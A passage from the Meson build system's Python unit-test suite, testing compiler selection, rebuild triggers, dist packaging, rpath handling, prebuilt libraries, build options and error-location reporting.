self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
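# For each test target, record which compiler was used for each source language.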
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
# Changing mtime of libfile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def has_working_hg(self):
if not shutil.which('hg'):
return False
try:
# This check should not be necessary, but
# CI under macOS passes the above test even
# though Mercurial is not installed.
if subprocess.call(['hg', '--version'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
return False
return True
except FileNotFoundError:
return False
def test_dist_hg(self):
if not self.has_working_hg():
raise unittest.SkipTest('Mercurial not found or broken.')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <[email protected]>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
def dist_impl(self, vcs_init, include_subprojects=True):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']),
sorted(z.namelist()))
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/subprojects/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c',
'disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/meson.build']),
sorted(z.namelist()))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
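# For orientation: the dynamic loader expands $ORIGIN at runtime to the
# directory containing the binary itself, so an rpath entry such as
# '$ORIGIN/subdir' lets 'prog' find 'subdir/liblib1.so' no matter where the
# build tree is moved.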
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertIsNone(rpath)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.FORBIDDEN_TARGET_NAMES
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
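# The tuple returned above is unpacked by the prebuilt-library tests below as
#   (cc, stlinker, objext, shext) = self.detect_prebuild_env()
# yielding e.g. 'obj'/'dll' suffixes on native Windows and 'o'/'so' on Linux,
# so the hand-built artifacts match what the detected toolchain expects.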
def pbcompile(self, compiler, source, objectfile, extra_args=None):
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
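# Roughly, pbcompile() runs one of the following, depending on the detected
# compiler's argument syntax (the executable itself comes from get_exelist()):
#   MSVC-like: <cl> /nologo /Fo<objectfile> /c <source> <extra_args...>
#   otherwise: <cc> -c <source> -o <objectfile> <extra_args...>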
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
# Build the archive command from the detected static linker; with GNU tools
# this amounts to roughly 'ar csr <outfile> <objectfile>', with MSVC-like
# toolchains to 'lib /NOLOGO /OUT:<outfile> <objectfile>'.
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
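# On a GCC-like toolchain the link step above amounts to something like
#   cc -shared -o libalexandria.so alexandria.o -Wl,-soname=libalexandria.so
# (with -fPIC added at compile time on non-Windows, non-macOS platforms),
# while an MSVC-style toolchain is driven with /NOLOGO /DLL /DEBUG
# /IMPLIB:<impfile> /OUT:<outfile> instead.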
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build.
Also test that unsatisfiable library deps are not a hard error, since
system libraries such as -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
@mock.patch.dict(os.environ)
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix(), '-DLIBFOO']
# pkg-config and pkgconf do not emit the flags in the same order
self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs))
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
# When running under Travis Mac CI, the file updates seem to happen
# so fast that the timestamps do not get properly updated.
# Call this method before file operations in the appropriate places
# to make things work.
def mac_ci_delay(self):
if is_osx() and is_ci():
import time
time.sleep(1)
def test_options_with_choices_changing(self) -> None:
"""Detect when options like arrays or combos have their choices change."""
testdir = Path(os.path.join(self.unit_test_dir, '84 change option choices'))
options1 = str(testdir / 'meson_options.1.txt')
options2 = str(testdir / 'meson_options.2.txt')
# Test that old options are changed to the new defaults if they are not valid
real_options = str(testdir / 'meson_options.txt')
self.addCleanup(os.unlink, real_options)
shutil.copy(options1, real_options)
self.init(str(testdir))
self.mac_ci_delay()
shutil.copy(options2, real_options)
self.build()
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == 'combo':
self.assertEqual(item['value'], 'b')
self.assertEqual(item['choices'], ['b', 'c', 'd'])
elif item['name'] == 'arr':
self.assertEqual(item['value'], ['b'])
self.assertEqual(item['choices'], ['b', 'c', 'd'])
self.wipe()
self.mac_ci_delay()
# When the old options are valid they should remain
shutil.copy(options1, real_options)
self.init(str(testdir), extra_args=['-Dcombo=c', '-Darray=b,c'])
self.mac_ci_delay()
shutil.copy(options2, real_options)
self.build()
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == 'combo':
self.assertEqual(item['value'], 'c')
self.assertEqual(item['choices'], ['b', 'c', 'd'])
elif item['name'] == 'arr':
self.assertEqual(item['value'], ['b', 'c'])
self.assertEqual(item['choices'], ['b', 'c', 'd'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'],
cwd=workdir,
stdout=subprocess.DEVNULL)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('102 subdir parse error', os.path.join('subdir', 'meson.build')),
('103 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_cs_compiler(MachineChoice.HOST)
langs.append('cs')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_java_compiler(MachineChoice.HOST)
langs.append('java')
except EnvironmentException:
pass
try:
env.detect_cuda_compiler(MachineChoice.HOST)
langs.append('cuda')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
try:
env.detect_objcpp_compiler(MachineChoice.HOST)
langs.append('objcpp')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
if not is_windows():
try:
env.detect_rust_compiler(MachineChoice.HOST)
langs.append('rust')
except EnvironmentException:
pass
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp', 'd'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
elif lang in ('java',):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
f.write('public class Foo { public static void main() {} }')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
def test_compiler_run_command(self):
'''
